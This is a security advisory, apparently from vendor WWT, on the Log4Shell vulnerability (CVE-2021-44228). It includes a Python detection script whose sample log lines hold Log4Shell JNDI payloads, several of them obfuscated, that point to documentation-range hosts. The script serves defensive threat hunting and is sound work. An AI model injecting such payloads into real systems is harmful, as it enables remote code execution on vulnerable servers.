Log4J Zero-Day Exploitation: What You Need to Know
Widespread zero-day exploitation of a Log4j vulnerability (CVE-2021-44228) is underway. Successful exploitation gives the attacker remote code execution (RCE). A significant number of popular and widely integrated solutions are affected and are being actively exploited by adversaries.
The vulnerability, nicknamed Log4Shell, affects a wide range of solutions, including but not limited to: servers and clients running Java applications that use the Log4j logging framework; Elasticsearch; Apache Struts; appliances that embed Java; log forwarding chains, where a malicious string recorded by one system is forwarded to a downstream system that is vulnerable when it logs that string; cloud solutions (e.g., iCloud on laptops); and Supervisory Control and Data Acquisition (SCADA) systems.
Exploitation in the wild has been confirmed from multiple adversaries, including reported nation-state Advanced Persistent Threat (APT) actors and eCrime operators deploying ransomware, Trojans and Distributed Denial of Service (DDoS) malware, among them the long-running Mirai botnet.
How critical is the attack?
Severity is scored on the 0 – 10 CVSS scale, and CVE-2021-44228 carries the maximum score of 10. It was publicly disclosed on Dec. 9, 2021. Successful exploitation is the worst-case outcome: remote code execution (RCE) and full compromise of the affected asset.
Given the diversity and breadth of affected integrations, the highest possible severity rating and widespread active exploitation, this vulnerability is an imminent threat to every organization running an affected component.
Unlike a typical single-vector exploit, this risk is akin to a cluster bomb: many attack vectors, architectures and embedded vulnerable components, all easily and reliably exploited by nation-state and eCrime actors.
Are we impacted?
WWT is aware of the RCE vulnerability in Log4j (CVE-2021-44228) and is actively engaged to mitigate threats. On Friday, December 10th, we implemented multiple strategies to prevent the exploitation of the Log4j vulnerability while we update the applications using impacted versions of Log4j. Additionally, we have implemented threat-specific detective capabilities to alert on unusual behavior and our skilled security team is prepared to respond quickly.
We have engaged with our key third-party suppliers to ensure that they are aware of the vulnerability and are taking appropriate steps to remediate.
WWT has not found indications of successful exploitation of the vulnerability in our information systems. We will remain vigilant in monitoring and responding to the threat as it evolves.
What should my organization do?
We recommend due diligence in threat hunting for the known indicators of compromise (IOCs) and for anomalous activity associated with the disclosure and exploitation of this vulnerability. Because this vulnerability cuts across multiple technologies and architectural layers in organizations worldwide, due diligence is recommended for all organizations.
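As an added example (not part of the original WWT advisory and not WWT code), the following Python script demonstrates the IOC hunting recommended above: it scans log lines for the `${jndi:...}` lookup string that triggers CVE-2021-44228, after collapsing the nested `${lower:}`, `${upper:}` and `${...:-default}` lookups attackers use to hide the literal "jndi" from a plain grep. The log lines are constructed samples, the 203.0.113.0/24 addresses are from the documentation range, and the normalizer is a heuristic rather than Log4j's own lookup engine, so treat it as a triage aid, not as proof of absence.

```python
"""Hunt log lines for Log4Shell (CVE-2021-44228) JNDI lookup strings.

Added example for this advisory, not WWT code. It de-obfuscates the nested
Log4j lookups attackers use to hide "${jndi:" from naive grep, then reports
each lookup with its scheme. Heuristic only: it is not Log4j's lookup engine.
"""
import re
from typing import Iterable, List, NamedTuple, Optional

# Constructed sample log lines (not real traffic; 203.0.113.0/24 is a
# documentation range). Line 1 is the plain form; lines 3-5 hide "jndi" behind
# ${lower:}, ${env:...:-default} and ${::-x} lookups that Log4j resolves first.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:03:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://203.0.113.11:1099/x}"',
    '10.0.0.8 - - [10/Dec/2021:03:15:44 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOEXIST:-j}ndi:dns://203.0.113.12/probe}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:02 +0000] "POST /api HTTP/1.1" 200 91 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.13:1389/o}"',
]

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization; group 1 is the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z]+)\s*:[^}]*\}", re.IGNORECASE)


class JndiHit(NamedTuple):
    line_no: int     # 1-based index into the scanned lines
    scheme: str      # ldap, ldaps, rmi, dns, iiop, ... (lower-cased)
    normalized: str  # the lookup as Log4j would see it after nested resolution
    raw: str         # the original log line


def _resolve(content: str) -> Optional[str]:
    """Collapse one innermost lookup body, or return None to leave it alone.

    Handles the three tricks seen in the wild: ${lower:x}/${upper:x} case
    transforms, and "${anything:-default}" where the default text survives
    because the named lookup (e.g. a missing env var) yields nothing.
    """
    if ":-" in content and not content.lower().startswith("jndi:"):
        return content.split(":-", 1)[1]
    prefix, sep, rest = content.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None  # unknown lookup (date, ctx, jndi, ...): keep the literal text


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups inside-out until the text stops changing."""
    for _ in range(max_rounds):
        changed = False

        def _sub(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNERMOST.sub(_sub, text)
        if not changed:
            break
    return text


def find_jndi_lookups(lines: Iterable[str]) -> List[JndiHit]:
    """Return every JNDI lookup found after de-obfuscation, in line order."""
    hits: List[JndiHit] = []
    for line_no, raw in enumerate(lines, 1):
        normalized = normalize_lookups(raw)
        for m in _JNDI.finditer(normalized):
            hits.append(JndiHit(line_no, m.group(1).lower(), m.group(0), raw))
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {hit.line_no}: scheme={hit.scheme} lookup={hit.normalized}")
```

Run it against exported web, application and proxy logs, not only the service that faces the Internet: as noted above, the malicious string can be forwarded through a logging chain and only be evaluated by a downstream system. Zero hits from this script is not evidence of absence, since the payload may arrive in a header or field the application never writes to disk, and attackers vary the obfuscation beyond the three forms handled here.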
We recommend the following primary references when performing due diligence:
The WWT Virtual CISO program embeds seasoned cybersecurity consultants within the environment to help lead initiatives, like incident response and threat mitigation, and assist with program development, maturation and management.
Our Threat and Vulnerability Management Program offerings empower you to uncover and strategically address threats and vulnerabilities with a risk-based methodology, leveraging security automation to increase efficacy, with the ultimate goal of reducing risk across your organization's environment.
WWT's cybersecurity consultants possess more than 450 years of combined security experience, roughly 80 certifications and 100 years of government agency experience.